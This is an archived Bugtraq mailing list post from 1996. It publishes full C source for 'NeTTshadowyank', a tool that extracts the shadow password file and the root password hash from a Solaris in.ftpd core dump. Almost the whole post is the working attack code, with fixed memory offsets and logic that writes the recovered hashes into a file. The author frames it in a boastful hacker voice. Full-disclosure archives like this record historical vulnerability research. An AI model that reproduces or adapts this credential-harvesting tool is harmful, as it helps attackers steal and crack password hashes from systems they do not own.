Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Simple util for xtracting shadow files out of solaris in.ftpd

From: nettwerk () milkyway com (San Mehat)
Date: Fri, 18 Oct 1996 15:44:09 -0400

/* NeTTshadowyank.c, by NeTTwerk (nettwerk () spyder org)
   Oct 17, 1996
   Released into the Public Domain (not for use with some sets)
                              **NeTTshadowyank**
                                 Version 1.0
                              nettwerk () spyder org

  NeTTshadowyank is a simple utility which reads a corefile created by
in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root
password (which is corrupted in the shadow entry buffer), and puts it
in the appropriate place in the targetfile 'NeTTshadowyank.shadow'.

  This is a really brainless program from the perspective that it does
very *little* inteligence... Version 2.0, will have my infamous
'heuristics engine' which will *look* for shadow entries/passwd entries
in the binary file.

  (btw: if you dont know *how* to make in.ftpd dump core with the shadow
file inside it, tough luck)

  Greets for this little util go out for BioH,mudge,glyph (all the l0pht guys),
bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;)

latah.

questions can be sent to nettwerk () spyder org
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <malloc.h>
#include <unistd.h>
#include <sys/elftypes.h>
#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>

#define ROOT_OFFSET 0xd7d4
#define SHADOW_OFFSET 0xfadb
void main(argc,argv)
int argc;
char **argv;
{
        FILE *fp;
        FILE *fp2;
        char SZ_line[255];
        Elf32_Ehdr *Telf32_hdr;
        int I_fd;
        void *Vp_buff;
        struct stat Sstat_buf;
        char *Cp_ptr;

        if (argc!=2)
                {
                printf("[NeTTshadowyank] Usage: %s corefilename\n",argv[0]);
                exit(0);
                }
        if ((I_fd=open(argv[1],O_RDONLY))<0)
                {
                perror("Opening Corefile");
                exit(0);
                }
        if (fstat(I_fd,&Sstat_buf)<0)
                {
                perror("fstat()'ing file");
                exit(0);
                }
        printf("[NeTTshadowyank] Loading %s, size %d bytes\n",argv[1],Sstat_buf.st_size);
        if (!(Vp_buff=malloc(Sstat_buf.st_size)))
                {
                printf("Out of Memory\n");
                exit(0);
                }
        memset(Vp_buff,0,Sstat_buf.st_size);
        if (read(I_fd,(char *)Vp_buff,Sstat_buf.st_size)<0)
                {
                perror("Reading corefile");
                exit(0);
                }
        Telf32_hdr = (Elf32_Ehdr *)Vp_buff;
        printf("File Type ->%c%c%c%c\n",Telf32_hdr->e_ident[EI_MAG0]
                                                                                                                        
         ,Telf32_hdr->e_ident[EI_MAG1]
                                                                                                                        
         ,Telf32_hdr->e_ident[EI_MAG2]
                                                                                                                        
         ,Telf32_hdr->e_ident[EI_MAG3]);

        printf("File Class->0x%x",Telf32_hdr->e_ident[EI_CLASS]);

        if (Telf32_hdr->e_ident[EI_CLASS]==1)
                printf(" (32 Bit Binary)\n");
        else if (Telf32_hdr->e_ident[EI_CLASS]==2)
                printf(" (64 Bit Binary)\n");
        else
                printf(" (BAD Binary)\n");

        printf("File Data ->0x%x",Telf32_hdr->e_ident[EI_DATA]);

  if (Telf32_hdr->e_ident[EI_DATA]==1)
    printf(" (Least Significant Bit)\n");
  else if (Telf32_hdr->e_ident[EI_DATA]==2)
    printf(" (Most Significant Bit)\n");
  else
    printf(" (BAD Binary)\n");

        printf("File Vers ->0x%x\n",Telf32_hdr->e_ident[EI_VERSION]);
        printf("File Type ->0x%x",Telf32_hdr->e_type);
        if (Telf32_hdr->e_type==1)
                printf(" (Relocatable Executable)\n");
        else if (Telf32_hdr->e_type==2)
                printf(" (EXEC Executable)\n");
        else if (Telf32_hdr->e_type==3)
                printf(" (Dynamic Executable)\n");
        else if (Telf32_hdr->e_type==4)
                printf(" (Core Dump [Post-Mortem])\n");
        else if (Telf32_hdr->e_type==5)
                printf(" (Numeric Executable)\n");
        else
                printf(" (Unknown Binary Format)\n");

        Cp_ptr=Vp_buff+ROOT_OFFSET;
        printf("Root Password location (%s) ->%s\n",ROOT_OFFSET,Cp_ptr);

        printf("Reconstructing shadow file\n");
        if (!(fp=fopen("NeTTshadowyank.scratch","w")))
                {
                perror("Creating scratch file");
                exit(0);
                }
        Cp_ptr=Vp_buff+SHADOW_OFFSET;
        while(1)
                {
                if (!strncmp(Cp_ptr,"lic_key",7))
                        break;
                if (*Cp_ptr=='#')
                        break;
                if (*Cp_ptr==0)
                        fprintf(fp," ");
                else
                        fprintf(fp,"%c",*Cp_ptr);
                Cp_ptr++;
                }
        fclose(fp);
        if (!(fp=fopen("NeTTshadowyank.scratch","r")))
    {
    perror("Opening Scratch File");
    exit(0);
    }
  if (!(fp2=fopen("NeTTshadowyank.shadow","w")))
    {
    perror("Creating target file");
    exit(0);
    }
  while(fgets(SZ_line,sizeof(SZ_line),fp))
                {
                SZ_line[(strlen(SZ_line)-1)]=0;
                if (!strncmp(SZ_line,"root",4))
                        {
                        Cp_ptr=Vp_buff+ROOT_OFFSET;
                        printf("[NeTTshadowyank] Repairing Root Shadow Entry\n");
                        fprintf(fp2,"root:%s:0::::::\n",Cp_ptr);
                        }
                else
                        fprintf(fp2,"%s\n",SZ_line);
                }
}
Previous By Date Next
Previous By Thread Next

Current thread: